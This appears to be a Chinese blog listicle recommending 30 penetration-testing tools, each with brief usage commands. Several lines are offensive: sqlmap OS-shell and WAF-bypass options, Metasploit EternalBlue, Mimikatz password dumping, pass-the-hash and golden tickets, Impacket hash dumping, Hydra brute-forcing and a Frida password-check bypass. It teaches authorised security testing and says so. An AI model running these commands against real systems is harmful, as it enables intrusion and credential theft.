
【前言】工欲善其事必先利其器。做網絡安全工具就是我們的武器。今天給大家整理了30款網安人必備的工具從入門到進階全覆蓋每一款都是我親測好用的。建議收藏用到的時候直接翻一、信息收集類5款1. Nmap —— 端口掃描之王官網nmap.org平臺Windows / Linux / macOSNmap就不用多介紹了吧滲透測試必備神器。功能強大到離譜端口掃描、服務識別、操作系統探測、腳本掃描樣樣精通。nmap-sV-sC-O192.168.1.0/24# 全端口服務腳本系統探測nmap -p--T4192.168.1.1# 全端口快速掃描nmap--scriptvuln192.168.1.1# 漏洞掃描腳本小技巧配合Zenmap圖形界面使用更直觀新手友好。2. Masscan —— 全網最快端口掃描器官網github.com/robertdavidgraham/masscan平臺Linux / macOS號稱5分鐘掃遍全網速度比Nmap快上百倍。適合大網段快速端口發現然后用Nmap做精細掃描。masscan -p80,443,22,3306192.168.0.0/16--rate100003. dirsearch —— 目錄掃描神器官網github.com/maurosoria/dirsearch平臺全平臺PythonWeb滲透必備的目錄/文件掃描工具比御劍好用字典豐富速度快。python3 dirsearch.py-uhttp://target.com-ephp,html,js4. subfinder —— 子域名挖掘機官網github.com/projectdiscovery/subfinder平臺全平臺Go語言ProjectDiscovery出品的子域名枚舉工具速度快、源多、準確率高。配合httpx使用效果更佳。subfinder-dtarget.com-all-silent|httpx-title-tech-detect -status-code5. theHarvester —— 信息收集瑞士軍刀官網github.com/laramies/theHarvester平臺Linux / macOS綜合信息收集工具可以收集子域名、郵箱、主機名、員工姓名等信息來源包括搜索引擎、PGP服務器、Shodan等。theHarvester-dtarget.com-ball二、Web滲透類6款6. Burp Suite —— Web滲透第一神器官網portswigger.net/burp平臺全平臺JavaWeb滲透測試的標配沒有之一。代理、爬蟲、掃描、 Intruder、Repeater、Decoder、Comparer……功能多到用不完。核心模塊Proxy—— 攔截修改HTTP/HTTPS請求Repeater—— 重放請求手動測試Intruder—— 自動化爆破賬號、密碼、驗證碼等Scanner—— 主動/被動漏洞掃描專業版Decoder—— 編碼解碼轉換Comparer—— 對比兩個響應的差異新手必裝插件HackBar、Wappalyzer、Cookie-Editor、Proxy SwitchyOmega7. sqlmap —— SQL注入自動化神器官網sqlmap.org平臺全平臺PythonSQL注入界的扛把子支持幾乎所有數據庫和所有注入類型。新手用它一把梭老鳥用它省時間。sqlmap-uhttp://target.com/page?id1--dbs# 爆數據庫sqlmap-uhttp://target.com/page?id1-Ddb--tables# 爆表sqlmap-uhttp://target.com/page?id1-Ddb-Tuser--columns# 爆字段sqlmap-uhttp://target.com/page?id1--os-shell# 拿shellsqlmap-rrequest.txt--tamperspace2comment# 繞過WAF常用tamper腳本space2comment、between、randomcase、charencode、unionalltounion8. XSStrike —— XSS檢測與利用工具官網github.com/s0md3v/XSStrike平臺全平臺Python比XSS Scanner好用N倍的XSS檢測工具支持GET/POST、爬蟲、WAF檢測、payload生成。python3 xsstrike.py-uhttp://target.com/search?qtestpython3 xsstrike.py-uhttp://target.com/form--dataqtestpython3 xsstrike.py-uhttp://target.com--crawl9. nuclei —— 基于模板的漏洞掃描器官網github.com/projectdiscovery/nuclei平臺全平臺Go語言ProjectDiscovery出品基于YAML模板的漏洞掃描器。社區貢獻了海量的POC模板新漏洞出來當天就能用上。批量挖洞神器。nuclei-uhttps://target.com-tcves/# 掃CVE漏洞nuclei-lurls.txt-ttechnologies/# 批量指紋識別nuclei-uhttps://target.com-tmisconfiguration/# 配置錯誤掃描nuclei-uhttps://target.com-scritical,high# 只掃高危以上10. OWASP ZAP —— 開源Web應用掃描器官網zaproxy.org平臺全平臺Java開源免費的Web應用安全掃描器功能類似Burp但完全免費。適合預算有限的團隊和個人學習使用。11. AWVS —— 自動化Web漏洞掃描官網invicti.com原Acunetix平臺Windows / Linux商業級Web漏洞掃描器掃描速度快、準確率高、誤報率低。企業做合規檢查和批量掃描必備。三、抓包分析類4款12. Wireshark —— 網絡抓包分析神器官網wireshark.org平臺全平臺最流行的網絡協議分析工具沒有之一。支持上千種協議的解析排查網絡問題、分析惡意流量、做CTF題都離不開它。常用過濾語法ip.addr 192.168.1.1 # 按IP過濾 tcp.port 80 # 按端口過濾 http.request.method GET # 按HTTP方法過濾 dns.qry.name test.com # 按DNS查詢過濾 tls.handshake.type 1 # TLS ClientHello13. tcpdump —— 命令行抓包工具官網tcpdump.org平臺Linux / macOS / UnixLinux下最常用的命令行抓包工具輕量、快速、穩定。服務器上排查問題首選。tcpdump-ieth0-wcapture.pcap# 抓包保存到文件tcpdump-ieth0 tcp port80# 只抓80端口的TCP包tcpdump-rcapture.pcap# 讀取抓包文件tcpdump-ieth0-nn-X-s0host1.1.1.1# 詳細顯示數據包內容14. Charles —— Mac/iOS抓包神器官網charlesproxy.com平臺macOS / Windows / LinuxMac和iOS開發/測試人員最愛用的抓包工具界面友好功能強大支持SSL代理、斷點、重寫、映射等。15. Fiddler —— Windows抓包神器官網telerik.com/fiddler平臺Windows為主Windows平臺下最流行的HTTP/HTTPS抓包工具插件豐富調試Web應用非常方便。四、內網滲透類5款16. Metasploit —— 滲透測試框架之王官網metasploit.com平臺Linux / macOS / Windows最著名的滲透測試框架漏洞利用、后滲透、payload生成、免殺……功能全到離譜。學滲透MSF是繞不開的。常用模塊auxiliary—— 輔助模塊掃描、爆破、信息收集exploits—— 漏洞利用模塊payloads—— 攻擊載荷meterpreter、shell等post—— 后滲透模塊提權、信息收集、橫向移動encoders—— 編碼模塊免殺用msfconsole# 啟動MSFsearch ms17_010# 搜索漏洞use exploit/windows/smb/ms17_010_eternalblue# 使用模塊setRHOSTS192.168.1.1# 設置目標run# 執行攻擊17. Cobalt Strike —— 紅隊作戰指揮中心官網cobaltstrike.com平臺全平臺Java紅隊必備神器分布式C2框架。多人協作、橫向移動、權限維持、釣魚、免殺……功能強大到沒朋友就是價格有點貴。18. Mimikatz —— 密碼抓取神器官網github.com/gentilkiwi/mimikatz平臺WindowsWindows密碼抓取界的傳奇。可以從內存中抓取明文密碼、NTLM哈希、Kerberos票據等。內網滲透必備。privilege::debug# 提升調試權限sekurlsa::logonpasswords# 抓取登錄密碼sekurlsa::pth /user:admin /domain:test /ntlm:xxx# Pass-the-Hashkerberos::golden...# 制作黃金票據19. Impacket —— 內網滲透工具集官網github.com/fortra/impacket平臺全平臺PythonPython編寫的Windows網絡協議工具集內網滲透神器。包含wmiexec、psexec、smbexec、secretsdump等一堆好用的工具。wmiexec.py admin:password192.168.1.1# WMI執行命令psexec.py admin:password192.168.1.1# PsExec獲取shellsecretsdump.py admin:password192.168.1.1# 導出SAM和LSA哈希smbclient.py admin:password192.168.1.1# SMB客戶端GetNPUsers.py test/ -dc-ip192.168.1.1# AS-REP Roasting20. CrackMapExec —— 內網瑞士軍刀官網github.com/mpgn/CrackMapExec平臺Linux / macOS / Windows后起之秀的內網滲透工具SMB、RDP、WinRM、MSSQL、SSH一把梭。批量掃網段、爆破、執行命令、枚舉信息非常好用。cme smb192.168.1.0/24# 掃描存活主機cme smb192.168.1.0/24-uadmin-pPss123# 密碼驗證cme smb192.168.1.0/24-uadmin-Hhash--shares# 枚舉共享cme winrm192.168.1.10-uadmin-pPss123-xwhoami# 執行命令五、逆向分析類4款21. IDA Pro —— 逆向工程之王官網hex-rays.com/ida-pro/平臺Windows / Linux / macOS逆向分析界的絕對王者反匯編F5偽代碼功能強大到無以復加。做逆向、搞Pwn、分析病毒IDA是吃飯的家伙。就是價格……emmm……大家懂的。22. Ghidra —— 開源逆向工具新貴官網ghidra-sre.org平臺全平臺JavaNSA開源的逆向工具功能直逼IDA Pro關鍵是免費對新手友好社區活躍插件越來越多。預算有限的同學強烈推薦。23. x64dbg —— Windows動態調試神器官網x64dbg.com平臺WindowsWindows下最好用的開源調試器32位和64位都支持。界面友好、插件豐富替代OllyDbg的最佳選擇。24. Frida —— 動態插樁工具官網frida.re平臺全平臺動態二進制插樁工具可以Hook函數、修改參數、篡改返回值。Android逆向和iOS逆向必備不用脫殼就能分析APP。// Frida Hook示例Hook Java方法Java.perform(function(){varMainActivityJava.use(com.example.MainActivity);MainActivity.checkPassword.implementationfunction(pwd){console.log(輸入的密碼pwd);returntrue;// 直接返回true繞過驗證};});六、其他實用工具6款25. Kali Linux —— 滲透測試專用系統官網kali.org平臺全平臺做滲透測試的標配系統預裝了上百款安全工具開箱即用。新手入門的最佳選擇不用一個個裝工具。推薦虛擬機里裝Kali宿主機用Windows或Mac日常用宿主機做測試切到Kali。26. pwntools —— CTF Pwn神器官網github.com/Gallopsled/pwntools平臺Linux / macOSPython編寫的CTF Pwn題框架寫exp必備。遠程連接、本地調試、ROP鏈構建、shellcode生成一條龍服務。frompwnimport*premote(target.com,1234)# p process(./vuln) # 本地調試payloadbA*0x20p64(0xdeadbeef)p64(0x401234)p.sendline(payload)p.interactive()27. Hashcat —— 密碼破解之王官網hashcat.net平臺全平臺世界上最快的密碼恢復工具支持GPU加速支持幾百種哈希類型。破解各種密碼哈希都靠它。hashcat-m0md5_hashes.txt wordlist.txt# 破解MD5hashcat-m1000ntlm_hashes.txt wordlist.txt# 破解NTLMhashcat-m3200bcrypt_hashes.txt wordlist.txt# 破解bcrypthashcat-m2500handshake.hccapx wordlist.txt# 破解WiFi密碼28. Hydra —— 暴力破解神器官網github.com/vanhauser-thc/thc-hydra平臺Linux / macOS支持超多協議的暴力破解工具SSH、FTP、SMB、RDP、HTTP表單、MySQL……幾乎你能想到的協議都支持。hydra-ladmin-Ppass.txt192.168.1.1ssh# SSH爆破hydra-Lusers.txt-Ppass.txt192.168.1.1ftp# FTP爆破hydra-ladmin-Ppass.txt192.168.1.1 smb# SMB爆破hydra-ladmin-Ppass.txt192.168.1.1 rdp# RDP爆破29. SearchSploit —— 漏洞利用搜索官網exploit-db.com/searchsploit平臺Linux / macOS / WindowsExploit-DB的離線版本可以快速搜索已知漏洞的POC和exp。做滲透測試的時候快速查一下說不定有驚喜。searchsploit smb# 搜索SMB相關漏洞searchsploit-mwindows/remote/42315.py# 復制exp到當前目錄30. Wfuzz —— Web模糊測試工具官網github.com/xmendez/wfuzz平臺全平臺PythonWeb應用模糊測試工具可以爆破目錄、參數、用戶名、密碼等。靈活度非常高支持各種payload和過濾器。wfuzz-c-zfile,wordlist.txt-uhttp://target.com/FUZZ# 目錄爆破wfuzz-c-zfile,users.txt-zfile,pass.txt-duserFUZZpassFUZ2Zhttp://target.com/login# 表單爆破七、工具使用心法最后分享幾個我自己的心得1. 工具只是工具思路才是核心不要沉迷于收集工具更重要的是理解原理和培養思維。同樣一把刀在廚師手里是藝術品在莽夫手里只能切菜。2. 精通幾款常用的就夠了不用每款工具都玩得很溜把最常用的幾款Burp、Nmap、sqlmap、MSF用精通比什么都懂一點強得多。3. 能自己寫工具就自己寫當你能用Python寫出自己的小工具的時候說明你真的入門了。自動化腳本、POC編寫、爬蟲、掃描器……寫過一遍理解完全不一樣。4. 關注工具的更新安全圈變化很快工具也在不斷更新。保持關注及時升級新功能可能幫你省很多時間。5. 合法使用不要越界所有工具都只能在授權的情況下使用不要拿去搞事情。技術是中性的但人要有底線。【粉絲福利】我把整理好的《網安工具大禮包》含30款工具安裝包、常用字典、payload庫、常用命令速查表免費發給你以上工具均僅用于合法授權的安全測試和學習研究。請遵守法律法規非法使用后果自負。